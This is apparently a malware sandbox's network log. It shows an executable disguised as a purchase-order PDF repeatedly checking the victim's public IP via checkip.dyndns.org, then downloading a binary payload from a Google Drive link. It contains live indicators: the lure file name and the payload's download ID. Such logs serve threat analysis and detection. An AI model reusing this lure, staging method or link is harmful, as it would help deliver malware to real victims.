                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Dec 17, 2024 03:29:47.167257071 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 17, 2024 03:29:47.490616083 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:29:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 581f384b42c7e42fc6e02c2a3f8e0c4d
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Dec 17, 2024 03:29:55.298147917 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 17, 2024 03:29:55.619884968 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:29:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d01a076b1ae90b25cf3b4974c261c6d3
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449748193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:29:58.150279999 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 17, 2024 03:29:59.247704983 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:29:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b16027745ed8cfc384a76b3deebca4b0
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449755193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:01.341950893 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 17, 2024 03:30:12.433202982 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:12 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a60bb8f1eea81a8e5a02937dd777ebfe
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449787193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:14.571630955 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:19.952058077 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 5c5855a7290b1b1df5a472c0d78075ab
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449809193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:22.349205017 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:23.850805998 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 165f421089f2cd108923788c4b0dba4a
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449820193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:26.101749897 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:28.780415058 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a6d40eacd2299c57e75a0d5a0ebf370f
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449833193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:30.952403069 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:33.184701920 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:33 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 3d7cd189bb5732fb8991c1aa6d2f2ba9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449845193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:35.403019905 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:36.499257088 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:36 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 894b6d1cf6c87d5fce33fc8ccd6ae861
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449856193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:38.645919085 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:41.932009935 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: af4d26ddc1a430103d38d2f6c019d473
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449869193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:44.186748981 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:46.649015903 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d322aa0f8ec19fa56142ce99ee9d7065
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449880193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:48.775249004 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:49.871965885 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 634e073cefb708972cc62ae07a8e6bbe
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449891193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:52.077415943 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:54.273268938 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 427a7dd535e947f004c274dcd3059e0b
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449901193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:30:56.406482935 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:30:58.549431086 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:30:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 1db9f2d34e520a6a61aeea9e2b601167
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449913193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:31:00.720274925 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:31:03.529387951 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:31:03 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: ddff9ba170265ed649b82b3d3e4b9102
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449736142.250.186.1744437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:29:39 UTC216OUTGET /uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2024-12-17 02:29:40 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Tue, 17 Dec 2024 02:29:39 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Content-Security-Policy: script-src 'nonce-tbgWKcttRspVE-wfQktq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449737142.250.185.1934437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:29:41 UTC258OUTGET /download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:29:44 UTC4944INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFiumC7GcukGBVc7iSB-9UWX87LaEbGIa0xVSjfZi9QEPv5NVv1xSAqR3KCYtL7GbybkM2yU
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="ZoddIgjccgVZcWoJPwNBJ172.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Mon, 16 Dec 2024 21:03:38 GMT
                                                                                                          Date: Tue, 17 Dec 2024 02:29:43 GMT
                                                                                                          Expires: Tue, 17 Dec 2024 02:29:43 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=hYU8PA==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
